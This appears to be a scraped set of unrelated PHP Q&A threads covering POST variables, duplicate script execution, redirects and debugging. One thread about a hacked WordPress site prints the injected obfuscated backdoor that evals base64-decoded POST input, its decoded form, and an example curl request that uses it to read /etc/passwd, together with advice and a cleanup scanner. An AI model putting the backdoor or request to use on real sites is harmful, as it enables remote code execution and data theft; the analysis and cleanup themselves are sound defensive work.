PHP HTTP_POST_VARS problem - php

To start: I am a C++ developer who is roped into making a PHP script (for paypal IPN).
I have been incredibly frustrated with the lack of good working samples from PayPal and elsewhere.
The latest problem is that I seem to not get any of the $HTTP_POST_VARS items that I think I should be getting.
Some searches online seem to indicate that this is either deprecated or configurable, etc.
I have no idea what version of PHP is used at my host.
It seems clear that either my testing applications do not post correctly or the script is not working.
so: 2 questions:
- Does anyone have any links to working IPN scripts?
- What gives with the $HTTP_POST_VARS nonsense?
EDIT
thanks all. I'll try these suggestions out and post up my success story soon I hope.

You can check what version of PHP you are using by typing phpinfo(); into a PHP script block <?php ?> and seeing what it outputs (or simply echo PHP_VERSION).
$HTTP_POST_VARS is the old way of doing things. You can use $_POST['post-var']. To examine everything being posted, use print_r($_POST).

First thing to try is changing $HTTP_POST_VARS to $_POST. That's the new mechanism, and after some version or another $HTTP_POST_VARS stopped being a superglobal.

As chaos already wrote, just use the $_POST array instead of $HTTP_POST_VARS.
Two things I'd like to mention:
1. The var_dump(somevar) function is very helpful in PHP. It displays structured information about somevar. If you are not sure how some variable or array or whatever is structured, just use this function. So the call var_dump($_POST); will display all the current POST parameters.
2. The phpinfo() function is helpful if you are interested in which version and extensions your host is using. Just create a file with <?php phpinfo(); ?> in it and navigate to this file with the browser. Don't forget to remove it afterwards, because of the security leak.

Related

Suspicious code found in my WordPress site - How to fix?

One of my sites was hacked last night and some porno content was placed on my site.
What I have done:
I have removed manually the adult content from site by using FTP.
My website is up now and working fine. But I am still able to find some code in my plugin and theme files that was not written by me. The code is as below:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
?>
What my queries are:
What this code stands for, what is this doing?
Is this harmful?
Should I remove this code from my files?
Will this have any effect on my site if removed?
Other Code Suggestions Required:
This sort of code is present in 100+ files. Is there any method to remove the code from all files at once? Or any method to keep the code and just disinfect it? That would save me the time of removing the code manually from so many files.
What this code stands for, what is this doing?
This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do.
<?php
eval( base64_decode( $_POST['n842e1c'] ) );
An attacker can make a post request to this file with his encoded payload in POST parameter n842e1c and execute PHP code.
Example:
curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE
Here this ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the BASE64 encoded string of echo readfile('/etc/passwd');.
Is this harmful?
Yes
Should I remove this code from my files?
Yes
Will this make any effect on my site if removed?
No
Here are some tips to help you clean the website. Also, follow this official post by WordPress to take the necessary steps.
It's a backdoor, taking a POST parameter named n842e1c and executing it. The instruction is encoded as Base64.
It is.
You should immediately.
Nothing, remove it asap.
Maybe re-install WordPress, or you could quickly develop a script in Python (or something else) to remove this string from your files.
PHP eval is dangerous.
It basically executes the code within its function. So you must remove it if you are not sure of its use in your website.
The eval() language construct is very dangerous because it allows
execution of arbitrary PHP code. Its use thus is discouraged. If you
have carefully verified that there is no other option than to use this
construct, pay special attention not to pass any user provided data
into it without properly validating it beforehand.
Source
You cannot disable it directly, so the only choice is to remove the code from all the files.
Try installing these free plugins on your Website.
Sucuri WordPress Auditing and Theme Authenticity Checker (TAC).
Follow below URLs to get some help.
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/
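For the "100+ files" question and the suggestion to script the removal, here is an added Python example (not code from any of the posters). It resolves the character-table obfuscation shown in the question and strips a block only when it resolves to a decoder applied to request input; the decoder list and the function names are assumptions made for this example.

```python
import re

# Shape of the injected block quoted above: a lookup string, names built from
# indexed characters, then eval() of a decoded request parameter.
BLOCK_RE = re.compile(
    r'<\?php\s*\$(?P<tbl>\w+)\s*=\s*"(?P<chars>[^"]+)";'
    r'(?P<body>(?:(?!\?>).)*?)'
    r'eval\(\s*\$\w+\(\s*\$\w+\s*\)\s*\);\s*\}\s*\?>',
    re.DOTALL,
)
CALL_RE = re.compile(r'(strtolower|strtoupper)\(([^()]*)\)')
DECODERS = {'base64_decode', 'gzinflate', 'str_rot13'}  # assumed list
REQUEST_VARS = {'_POST', '_GET', '_REQUEST', '_COOKIE'}

def resolve_names(tbl, chars, body):
    """Rebuild the strings hidden behind $tbl[i].$tbl[j]... concatenations."""
    index_re = re.compile(r'\$' + re.escape(tbl) + r'\[(\d+)\]')
    names = []
    for func, arg in CALL_RE.findall(body):
        idx = [int(i) for i in index_re.findall(arg)]
        if idx and max(idx) < len(chars):
            text = ''.join(chars[i] for i in idx)
            names.append(text.lower() if func == 'strtolower' else text.upper())
    return names

def scan(source):
    """Return (cleaned_source, findings) for the text of one PHP file."""
    findings = []
    def strip(match):
        names = resolve_names(match['tbl'], match['chars'], match['body'])
        if DECODERS & set(names) and REQUEST_VARS & set(names):
            param = re.search(r"\}\[\s*'([^']+)'\s*\]", match['body'])
            findings.append((names, param.group(1) if param else None))
            return ''          # drop only blocks that resolve to a backdoor
        return match.group(0)  # anything else is left untouched
    return BLOCK_RE.sub(strip, source), findings

# Constructed sample: the block from the question prepended to a theme file.
SAMPLE = '''<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
?>
<?php get_header(); ?>
'''
```

Run scan() over each file's text and review the findings before writing anything back. Removing the block cleans the file but not the way it got there, so the reinstall and clean-up guides linked in the answers still apply.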

PHP seems to execute script twice

My web server is acting weird. It seems like it executes scripts (PHP) twice before sending them to Apache.
I've run this file:
<?php
echo '<pre>';
session_start();
$_SESSION['index']++;
echo '<br>';
print_r($_SESSION);
?>
And I know that ++ will give a notice at first, but it's just to investigate if it runs twice. Anyway, the printed session shows that the index-index increases by two each time you load the page.
The webserver is apache2, php5 installed on a debian unit.
Anyone has any ideas?
echo '<pre>'; //Headers and cookies already sent.
session_start(); //Cannot set cookie anymore, system tries again, I guess
Start session first, then output anything.
Try placing session_start(); on top
I can't thank the poster of this question enough. His session test made me realize that I had the same problem of a php script running several times.
In my script I had two PDO functions separated from each other by an if-else construct. One was a simple select, and one a simple insert function. But every time I ran the script, both PDO commands got executed. PDO ended up writing rows in my table which had the entry 'public'.
So what happened? My page got sent multiple times because of ELEMENTS IN THE HTML CODE THAT COULD NOT BE FOUND. In my case that was a CSS file which was named incorrectly. When I solved that (after 4 hours of looking at code) the problem disappeared. Broken images, for example, also trigger the same event.
OK folks, found a completely insane solution to this problem. Just posting for future reference. I recently installed an HTML validator in Chrome (an extension). This seems to be the culprit. After everything has loaded, the validator seems to be re-requesting the page so it is executed twice.
Nice plugin. Not!
Took me about half a day to figure this out.
I am seeing the same behaviour... a $_POST would be present the first time the page ran, then wouldn't the second time... scoured the code to find why the page might be posting back to itself again. No avail.
After seeing user1601869's answer above, I started checking. I had some links to stylesheets I hadn't written yet, so put skeletons of those in.
It turns out that for me, the culprit was:
<link rel="shortcut icon" href="">
This was just a placeholder for an icon that was causing my page to break. I suggest that if you have the same problem, look for links in the <HEAD></HEAD> that are broken!

Redirecting using PHP (not using header)

Is there a way to redirect using PHP without using header("Location: http://www.google.com")? I put that at the top, right after a PHP script (which has no output), but it doesn't work. I use the PHP to check something in the database, and it will redirect depending on the contents.
"Right after a PHP script"? Well, it's going to have to be in a PHP script to work.
If that's not it, please consider showing your previous code. Remember, don't post a question asking how to implement your solution, but rather the question itself...
Your code should always work as long as the header is called before any echo or print statements that send output to the browser. Another possibility is your webserver sending out additional output or headers that are causing the redirect to not work.
One way to test would be to telnet to your webserver and send GET /myscript.php. Then view the result and see if it is what you expect.
Per the PHP documentation:
Remember that header() must be called before any actual output is
sent, either by normal HTML tags, blank lines in a file, or from PHP.
It is a very common error to read code with include(), or require(),
functions, or another file access function, and have spaces or empty
lines that are output before header() is called. The same problem
exists when using a single PHP/HTML file.
Without seeing the actual code that the redirect resides in it will be difficult to assist. Perhaps if you could provide more details then someone may be able to suggest another technology to help, but the header method is the only one that I've come across.

Autocomplete in .php framework doesn't seem to work any longer

I have a basic Autocomplete and Add to the database function and, for some reason, it has stopped working completely and I don't get any useful information from Firebug or otherwise about what the problem could be.
I am guessing it is something simple, but don't know where to look.
This is the library where I am making the call:
http://github.com/allyforce/AF-upload/blob/master/Library/Target1.class.php
What browser are you debugging on? Firefox displays Ajax errors correctly, but no others do unless you apply this patch (which will be in the next release of QCubed):
http://trac.qcu.be/projects/qcubed/ticket/432
Someone found the right answer in terms of removing a QEvent.

is it possible to execute a portion of a php script to see what it does?

I am pulling apart a third-party shopping cart and they have included a bunch of junk (as usual). Aside from having to remove and bring back pieces of code to see what it does, is it possible to execute a few lines?
Although commenting out the code I don't want to execute sounds good, which I just thought of :p
but what other things exist that you guys know of?
thanks
This may be obvious but you can use a debugger (eclipse php or netbeans) and just put breakpoints after certain parts and "run to" that portion of the code. From there you can evaluate variables and potentially see output as it happens.
I don't know about codepad but I'm pretty sure Dreamweaver doesn't have a native PHP debugger built in. Take a look at Xdebug or the Zend IDE.
